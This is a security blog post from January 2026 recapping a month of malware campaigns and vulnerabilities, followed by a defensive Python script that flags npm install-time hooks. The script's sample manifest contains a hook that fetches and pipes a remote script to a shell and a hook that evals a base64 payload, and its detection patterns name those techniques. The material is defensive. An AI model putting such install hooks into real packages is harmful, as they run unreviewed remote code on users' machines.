
BITS ARE FLIPPING AGAIN: KIMWOLF, RATs & THE ENDLESS PATCH CYCLE.
By Grimbly31 · 1/15/2026
Dusting Off the Old Shields: A Look Back at the Last Month in the Digital Trenches
Alright, settle in, youngbloods. Grimbly31 here. Seen a lot of bits flip in my time. Used to be you could trace a hack back to a pizza-fueled basement dweller, now… well, it's still sometimes that, but things are getting layered. The last thirty days have been a reminder that the basics haven’t changed – people are still the weakest link, and code is still full of holes – but the way we get poked at is evolving. Fast.
Let’s start with the noise. Two million devices got tangled up with the Kimwolf Android botnet this month. Two million. That's a lot of compromised phones sending spam and probably worse. And speaking of widespread annoyance, the DarkSpectre browser extension campaigns managed to snag data from 8.8 million users. Extensions. Always check what you're installing, kids. Always.
Down in Brazil, things were a bit more targeted. A WhatsApp worm was spreading the Astaroth banking Trojan. Classic social engineering, dressed up with a new delivery method. They’re not inventing new tricks, they're just refining the old ones. Like I said.
But the real shift is happening under the hood. The chatter's been strong about AI being used – not to create new attack vectors, but to make the old ones better. We're seeing automated exploitation of vulnerabilities, more effective supply chain attacks, that sort of thing. It’s less Skynet, more a really, really good script kiddie. And, naturally, everyone's scrambling to secure the AI doing the defending. Saw a webinar advertised on securing agentic AI workflows. Honestly? Feels a bit like locking the stable door after the horse has learned to use a crowbar.
And speaking of under the hood, Linux is taking a beating. This VoidLink malware framework is serious. Specifically targeting cloud environments, containers… the places where everything’s moving. It’s advanced, it’s stealthy, and it's a clear sign that attackers are going after the infrastructure itself, not just the endpoints. There's been a related campaign, UAT-7290, linked to China, hitting up telecoms with Linux nastiness. Feels like the old days of targeted infrastructure attacks, just… slicker.
The web’s still a mess, naturally. A long-running web skimming campaign is still grabbing credit card data. Seems like some things just never change. And we had two separate Chrome extensions stealing ChatGPT and DeepSeek chats from 900,000 users. Nine hundred thousand. People just handing over their conversations. Folks, if you’re sharing anything sensitive on those platforms, assume it’s being watched.
Then there’s the constant patching. n8n had a critical RCE vulnerability (CVSS 10.0, seriously!), and a CVSS 9.9 one right before it. Microsoft Office and HPE OneView are both in CISA’s Known Exploited Vulnerabilities catalog as actively exploited, and Cisco ISE is on the list too. It's a never-ending game of whack-a-mole.
And because it’s 2026, there’s a new RAT hiding in npm packages. This one’s called NodeCordRAT, and it's themed around Bitcoin. Honestly, at this point, I'm expecting malware to be delivered via NFT drops.
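The practical check here: npm runs `preinstall`, `install`, `postinstall` and `prepare` scripts automatically, so that is where a package-borne RAT gets its first execution. The script below is an added example (mine, not from the original post, and not tied to NodeCordRAT or any real package) that audits a `package.json` manifest for lifecycle hooks and flags the shapes of commands that rarely belong in a legitimate install script. The two manifests at the bottom are constructed for the demo; `example.invalid` is a reserved placeholder, not a real host.

```python
import json
import re

# Lifecycle hooks that npm executes on its own during `npm install`.
# Anything here runs with the installing user's privileges on every machine
# that pulls the package, which is exactly what a dropper wants.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Command shapes that are unusual in an honest build step and common in droppers.
SUSPICIOUS = {
    "remote fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I),
    "inline node": re.compile(r"\bnode\s+-e\b"),
    "encoded payload": re.compile(r"\bbase64\b|\batob\s*\(", re.I),
    "dynamic eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "shell pipe": re.compile(r"\|\s*(sh|bash|zsh)\b"),
}


def audit_manifest(manifest: dict) -> list[str]:
    """Return human-readable findings for a parsed package.json.

    An empty list means no lifecycle hooks are declared. A hook by itself is
    only a warning; a hook plus a suspicious pattern deserves a manual look
    before anything gets installed.
    """
    findings: list[str] = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str) or not cmd.strip():
            continue
        findings.append(f"lifecycle hook '{hook}': {cmd}")
        for label, pattern in SUSPICIOUS.items():
            if pattern.search(cmd):
                findings.append(f"  {label} in '{hook}'")
    return findings


def audit_manifest_text(text: str) -> list[str]:
    """Same check, but from raw JSON text (e.g. the output of `npm view <pkg> --json`)."""
    return audit_manifest(json.loads(text))


# Constructed sample: a boring package with no install-time hooks.
BENIGN_MANIFEST = {
    "name": "left-pad-ish",
    "version": "1.0.0",
    "scripts": {"test": "jest", "build": "tsc"},
}

# Constructed sample: the kind of manifest a dropper ships. Hypothetical, not a real package.
SUSPICIOUS_MANIFEST = {
    "name": "btc-price-helper",
    "version": "0.0.3",
    "scripts": {
        "preinstall": "node -e \"eval(Buffer.from('aGk=','base64').toString())\"",
        "postinstall": "curl -s https://example.invalid/setup.sh | sh",
        "test": "echo ok",
    },
}


if __name__ == "__main__":
    for label, manifest in (("benign", BENIGN_MANIFEST), ("suspicious", SUSPICIOUS_MANIFEST)):
        print(f"== {label} ==")
        for line in audit_manifest(manifest) or ["  (no lifecycle hooks declared)"]:
            print(line)
```

Run it against `npm view <package> --json` before a fresh dependency lands in a lockfile, or point it at every `node_modules/*/package.json` after the fact. It is a triage filter, not a verdict: plenty of honest native-addon packages declare `install` scripts, and `--ignore-scripts` is still the setting you want in CI when you can live without them.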
I was looking at the SANS Surge training schedule – they’re focusing on ransomware and SEC504 tools/playbooks. Smart move. Ransomware hasn’t gone anywhere, and knowing your tools is half the battle.
Look, it’s a lot. But here’s the takeaway: the core principles are still the same. Secure your systems, educate your users, and assume you’re already compromised. Dust off those old shields, update your threat models, and prepare for the next wave. Because believe me, there will be a next wave. I’ve seen enough cycles to know.